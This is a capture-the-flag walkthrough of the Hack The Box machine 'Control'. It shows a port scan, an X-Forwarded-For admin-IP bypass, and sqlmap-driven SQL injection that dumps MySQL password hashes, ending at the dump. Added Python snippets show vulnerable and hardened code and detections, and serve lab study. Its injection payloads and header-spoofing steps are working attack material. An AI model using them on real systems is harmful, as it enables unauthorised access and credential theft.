Hack The Box - Control

1. Intro

HackTheBox Control (10.10.10.167) is a Windows box released on 23 Nov 2019. The box is based around performing Kerberos attacks on Domain Controllers.

2. The Setup

Vulnerable Machine Name:    Control
Vulnerable Machine Network: 10.10.10.167

Attacker Machine:           Kali Linux 2020.1 (running on VMware)
Attacker Machine VM:        VMware
Attacker Machine IP:        10.10.15.124

Note: The attacker IP address changed a number of times throughout this tutorial due to VPN issues.

3. Scanning

We begin by trying to enumerate any open ports and services running on our target. To do this we use nmap with the following command:

nmap -sV -A -p- -Pn -T4 -v 10.10.10.167

# Command breaks down as follows

-sV             # Service/version detection
-A              # OS detection, version detection, script scanning and traceroute
-T4             # Aggressive (T4) timing template
-Pn             # Skip host discovery (treat the host as up)
-p-             # Scan all 65535 TCP ports
-v              # Verbose output
10.10.10.167    # IP address of Control

Nmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, HTTPOptions, NULL, WMSRequest, giop:
|_    Host '10.10.15.124' is not allowed to connect to this MariaDB server
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/3%Time=5E5E4597%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4B,
SF:"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4B
SF:,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,4B,"G\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.76 seconds

4. Service Enumeration

From our nmap scan we can see that there is not a lot running on this host outside of services on ports 80 and 135.

4.1 Samba (SMB)

We start our enumeration phase with enum4linux using the following command:

enum4linux 10.10.10.167

After numerous attempts it became apparent that this was going to get us nowhere.

4.2 Webserver

Navigating to the web page at http://10.10.10.167, we are met with the following error when trying to access the admin page.

After some manual enumeration a comment was discovered that appeared to leak an internal IP address, as shown in Figure 8.

5. Bypass IP blocks with the X-Forwarded-For header

It is well known that some web applications restrict access based on the visitor's IP address. This is particularly common for administrator interfaces, in an attempt to limit them to the addresses known to be used by actual administrators. It was discovered that the restriction on the admin page could be bypassed by spoofing the "X-Forwarded-For" HTTP header and setting it to the IP address found in Figure 8. The following outlines how this was done:

Firstly we setup a rule using the Burp extension "Add Custom Header" to add the "X-Forwarded-For" header to every request we make like so:

Next we go to our Project Options and add a new Session Handling Rule like so:

This successfully allowed us to bypass the IP restriction and access the Admin page.
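The bypass works because the application treats X-Forwarded-For as the client's address even though any client can set that header itself. The following Python snippet is an added example, not code from the box or from the original write-up: it contrasts a naive check of the kind bypassed above with one that only honours the header when the request arrived through a known reverse proxy, and otherwise decides on the TCP peer address. The admin network 192.168.4.0/24, the proxy address 10.0.0.5 and the sample requests are assumptions made for the example.

```python
"""Added example: gating an admin page on X-Forwarded-For.

check_access_naive() trusts the header from any client, which is the
behaviour bypassed in section 5.  check_access_hardened() uses the TCP peer
address unless the peer is a known reverse proxy.  All networks, proxy
addresses and requests here are constructed for the example."""
import ipaddress

# Assumed allow-list: the admin interface is meant for this internal network.
ADMIN_NETWORK = ipaddress.ip_network("192.168.4.0/24")
# Assumed reverse proxies that are permitted to append X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def _is_admin_address(addr: str) -> bool:
    return ipaddress.ip_address(addr) in ADMIN_NETWORK


def check_access_naive(peer_addr: str, headers: dict) -> bool:
    """Vulnerable: whatever the client claims in X-Forwarded-For wins."""
    claimed = headers.get("X-Forwarded-For", peer_addr).split(",")[0].strip()
    try:
        return _is_admin_address(claimed)
    except ValueError:
        return False


def effective_client_ip(peer_addr: str, headers: dict) -> str:
    """Return the address the server can actually vouch for.

    The header is only meaningful when the direct peer is a trusted proxy.
    With one proxy in front of the server, the right-most X-Forwarded-For
    entry is the one that proxy appended; anything to its left was supplied
    by the client and must not be trusted."""
    if ipaddress.ip_address(peer_addr) not in TRUSTED_PROXIES:
        return peer_addr
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops[-1] if hops else peer_addr


def check_access_hardened(peer_addr: str, headers: dict) -> bool:
    """Hardened: decide on the vouched-for address; malformed input denies."""
    try:
        return _is_admin_address(effective_client_ip(peer_addr, headers))
    except ValueError:
        return False


if __name__ == "__main__":
    # The request shape used in this section: external peer, forged header.
    spoofed = ("10.10.15.124", {"X-Forwarded-For": "192.168.4.28"})
    print("naive   :", check_access_naive(*spoofed))      # True  (bypassed)
    print("hardened:", check_access_hardened(*spoofed))   # False (denied)
```

The right-most-hop rule only holds when exactly one trusted proxy sits in front of the server; with a chain of proxies, strip one hop per trusted proxy from the right, and never take the left-most entry, which is the one the client controls.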

6. SQL Injection

It was discovered that an SQL injection vulnerability exists in the admin page, which ultimately resulted in a low privilege shell. The following outlines how this was done:

Firstly navigate to any product and select view like so:

Copy the request from Burp to a text file and modify it as shown so that the request line carries the full URL:

POST http://10.10.10.167/view_product.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28

productId=32
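The productId value in the body above is where the injection happens. As an added illustration that is not part of the original write-up, the following Python/sqlite3 snippet builds a small constructed product database, shows a lookup that pastes productId straight into the statement (the class of bug sqlmap finds below) beside a hardened lookup that validates the parameter and binds it. The table names, rows and the hash string are constructed; the boolean payloads mirror the shape of sqlmap's "Parameter replace" test, and sqlite3 is used only so the example runs offline (the box itself runs MariaDB).

```python
"""Added example: the injectable lookup behind productId, and its fix.

view_product_vulnerable() interpolates the parameter into SQL, which is the
class of bug sqlmap exploits below; view_product_hardened() validates and
binds it.  The schema, rows and the hash string are constructed samples.
sqlite3 is used so the example runs offline; the box itself runs MariaDB."""
import sqlite3

SCHEMA = """
CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE user (user TEXT, password TEXT);
INSERT INTO product VALUES (32, 'Widget'), (33, 'Gadget');
INSERT INTO user VALUES ('manager', '*CONSTRUCTEDHASH');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_product_vulnerable(conn, product_id: str) -> list:
    # The request parameter is pasted straight into the statement.
    sql = f"SELECT name FROM product WHERE id = {product_id}"
    return [row[0] for row in conn.execute(sql)]


def view_product_hardened(conn, product_id: str) -> list:
    # Validate the type first, then let the driver bind the value.
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        raise ValueError("productId must be an integer")
    return [row[0] for row in
            conn.execute("SELECT name FROM product WHERE id = ?", (pid,))]


# Inputs used by demo(): the normal value from the captured request, a UNION
# payload that reads another table (the query has one column, as sqlmap
# later confirms), and two boolean payloads whose responses differ.
BENIGN = "32"
UNION_PAYLOAD = "32 UNION ALL SELECT user || ':' || password FROM user"
BOOL_TRUE = "(SELECT CASE WHEN (1=1) THEN 32 ELSE 33 END)"
BOOL_FALSE = "(SELECT CASE WHEN (1=2) THEN 32 ELSE 33 END)"


def demo() -> dict:
    conn = make_db()
    out = {
        "vuln_benign": view_product_vulnerable(conn, BENIGN),
        "vuln_union": view_product_vulnerable(conn, UNION_PAYLOAD),
        "vuln_bool_true": view_product_vulnerable(conn, BOOL_TRUE),
        "vuln_bool_false": view_product_vulnerable(conn, BOOL_FALSE),
        "hard_benign": view_product_hardened(conn, BENIGN),
    }
    try:
        view_product_hardened(conn, UNION_PAYLOAD)
        out["hard_union"] = "accepted"
    except ValueError:
        out["hard_union"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

The two boolean payloads return different products, which is exactly the observable difference sqlmap's boolean-based blind test looks for; the hardened version never reaches the database with anything but an integer, so none of the payloads has an effect.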

Next we use sqlmap to enumerate the databases by issuing the following command:

sqlmap -r captured_request.txt --dbs

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:37:34 /2020-03-03/

[12:37:34] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:37:34] [INFO] testing connection to the target URL
[12:37:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:37:34] [INFO] testing if the target URL content is stable
[12:37:35] [INFO] target URL content is stable
[12:37:35] [INFO] testing if POST parameter 'productId' is dynamic
[12:37:35] [WARNING] POST parameter 'productId' does not appear to be dynamic
[12:37:35] [WARNING] heuristic (basic) test shows that POST parameter 'productId' might not be injectable
[12:37:35] [INFO] testing for SQL injection on POST parameter 'productId'
[12:37:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:37:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:37:46] [INFO] POST parameter 'productId' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --code=200)
[12:37:47] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL inline queries'
[12:38:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:38:16] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:38:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:38:32] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:38:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:38:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:38:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[12:38:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[12:39:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[12:39:24] [INFO] POST parameter 'productId' appears to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable 
[12:39:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:39:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:39:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:39:24] [INFO] target URL appears to have 1 column in query
[12:39:24] [INFO] POST parameter 'productId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'productId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:39:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:39:30] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] warehouse

[12:39:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 44 times
[12:39:30] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 12:39:30 /2020-03-03/

We can see that there are three databases:

  • information_schema

  • mysql

  • warehouse
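From the defender's side, the run above left a clear trail: 44 HTTP 500 responses to one endpoint from one client in about two minutes, with every request carrying an X-Forwarded-For header naming an internal address. The following Python snippet is an added example, not from the original write-up, of two simple detections over web-server access logs. The log format is a constructed, simplified one (date, time, client IP, method, path, status, X-Forwarded-For); the log lines, the trusted-proxy address 10.0.0.5 and the thresholds are assumptions made for the example.

```python
"""Added detection example over web-server access logs.

The log format is a constructed, simplified one:
  date time client-ip method path status x-forwarded-for ('-' if absent)
The lines, the proxy address and the thresholds below are assumptions."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = [  # constructed sample lines
    "2020-03-03 12:37:34 10.10.15.124 POST /view_product.php 200 192.168.4.28",
    "2020-03-03 12:37:35 10.10.15.124 POST /view_product.php 200 192.168.4.28",
    "2020-03-03 12:38:15 10.10.15.124 POST /view_product.php 500 192.168.4.28",
    "2020-03-03 12:38:15 10.10.15.124 POST /view_product.php 500 192.168.4.28",
    "2020-03-03 12:38:16 10.10.15.124 POST /view_product.php 500 192.168.4.28",
    "2020-03-03 12:38:16 10.10.15.124 POST /view_product.php 500 192.168.4.28",
    "2020-03-03 12:38:17 10.10.15.124 POST /view_product.php 500 192.168.4.28",
    "2020-03-03 12:40:01 10.10.15.200 GET /index.php 200 -",
    "2020-03-03 12:40:02 10.10.15.200 GET /view_product.php 500 -",
    "2020-03-03 12:41:00 10.0.0.5 GET /admin.php 200 192.168.4.28",
]
TRUSTED_PROXIES = {"10.0.0.5"}   # assumed reverse proxy
ERROR_THRESHOLD = 5              # 5xx responses ...
WINDOW = timedelta(minutes=2)    # ... within this window, per client and path


def parse_line(line: str) -> dict:
    date, time, client, method, path, status, xff = line.split()
    return {"ts": datetime.fromisoformat(f"{date} {time}"), "client": client,
            "method": method, "path": path, "status": int(status),
            "xff": None if xff == "-" else xff}


def detect_error_bursts(records, threshold=ERROR_THRESHOLD, window=WINDOW) -> list:
    """(client, path) pairs with >= threshold 5xx responses inside a sliding
    window.  Error-based and UNION probing leaves exactly this trail."""
    per_key = defaultdict(list)
    for r in records:
        if 500 <= r["status"] < 600:
            per_key[(r["client"], r["path"])].append(r["ts"])
    alerts = []
    for key, times in per_key.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append(key)
                break
    return alerts


def detect_spoofed_xff(records, trusted=TRUSTED_PROXIES) -> list:
    """Requests from a peer that is not a trusted proxy but that carry an
    X-Forwarded-For claiming a private address (or an unparsable one)."""
    alerts = set()
    for r in records:
        if r["xff"] is None or r["client"] in trusted:
            continue
        try:
            claimed = ipaddress.ip_address(r["xff"].split(",")[0].strip())
        except ValueError:
            alerts.add((r["client"], r["xff"]))
            continue
        if claimed.is_private:
            alerts.add((r["client"], r["xff"]))
    return sorted(alerts)


def run(lines=SAMPLE_LOG) -> dict:
    records = [parse_line(line) for line in lines]
    return {"error_bursts": detect_error_bursts(records),
            "spoofed_xff": detect_spoofed_xff(records)}


if __name__ == "__main__":
    print(run())
```

The spoofed-header check only makes sense once the server logs X-Forwarded-For (IIS can record it as a custom field); the error-burst check works on any access log and is the cheaper of the two to deploy.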

Focusing on the mysql database we attempt to retrieve a list of tables:

sqlmap -r captured_request.txt -D mysql --tables

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:48:28 /2020-03-03/

[12:48:28] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:48:28] [INFO] resuming back-end DBMS 'mysql' 
[12:48:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:48:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:48:29] [INFO] fetching tables for database: 'mysql'
Database: mysql
[31 tables]
+---------------------------+
| user                      |
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
+---------------------------+

[12:48:29] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 12:48:29 /2020-03-03/

Reviewing the output, we next try to enumerate the columns in the user table.

sqlmap -r captured_request.txt -D mysql -T user --columns

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:51:42 /2020-03-05/

[09:51:42] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:51:42] [INFO] resuming back-end DBMS 'mysql' 
[09:51:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:51:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:51:42] [INFO] fetching columns for table 'user' in database 'mysql'
Database: mysql
Table: user
[47 columns]
+------------------------+---------------------+
| Column                 | Type                |
+------------------------+---------------------+
| User                   | char(80)            |
| Alter_priv             | varchar(1)          |
| Alter_routine_priv     | varchar(1)          |
| authentication_string  | longtext            |
| Create_priv            | varchar(1)          |
| Create_routine_priv    | varchar(1)          |
| Create_tablespace_priv | varchar(1)          |
| Create_tmp_table_priv  | varchar(1)          |
| Create_user_priv       | varchar(1)          |
| Create_view_priv       | varchar(1)          |
| default_role           | longtext            |
| Delete_history_priv    | varchar(1)          |
| Delete_priv            | varchar(1)          |
| Drop_priv              | varchar(1)          |
| Event_priv             | varchar(1)          |
| Execute_priv           | varchar(1)          |
| File_priv              | varchar(1)          |
| Grant_priv             | varchar(1)          |
| Host                   | char(60)            |
| Index_priv             | varchar(1)          |
| Insert_priv            | varchar(1)          |
| is_role                | varchar(1)          |
| Lock_tables_priv       | varchar(1)          |
| max_connections        | bigint(20) unsigned |
| max_questions          | bigint(20) unsigned |
| max_statement_time     | decimal(12,6)       |
| max_updates            | bigint(20) unsigned |
| max_user_connections   | bigint(21)          |
| Password               | longtext            |
| password_expired       | varchar(1)          |
| plugin                 | longtext            |
| Process_priv           | varchar(1)          |
| References_priv        | varchar(1)          |
| Reload_priv            | varchar(1)          |
| Repl_client_priv       | varchar(1)          |
| Repl_slave_priv        | varchar(1)          |
| Select_priv            | varchar(1)          |
| Show_db_priv           | varchar(1)          |
| Show_view_priv         | varchar(1)          |
| Shutdown_priv          | varchar(1)          |
| ssl_cipher             | longtext            |
| ssl_type               | varchar(9)          |
| Super_priv             | varchar(1)          |
| Trigger_priv           | varchar(1)          |
| Update_priv            | varchar(1)          |
| x509_issuer            | longtext            |
| x509_subject           | longtext            |
+------------------------+---------------------+

[09:51:42] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

Next we grab the password hashes for all the users using the following command:

sqlmap -r captured_request.txt -D mysql -T user -C user,Password --dump

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:54:03 /2020-03-05/

[09:54:03] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:54:03] [INFO] resuming back-end DBMS 'mysql' 
[09:54:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:54:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:54:03] [INFO] fetching entries of column(s) 'Password, `user`' for table 'user' in database 'mysql'
[09:54:03] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:54:03] [INFO] retrieved: '*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D','hector'
[09:54:03] [INFO] retrieved: '*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA','manager'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
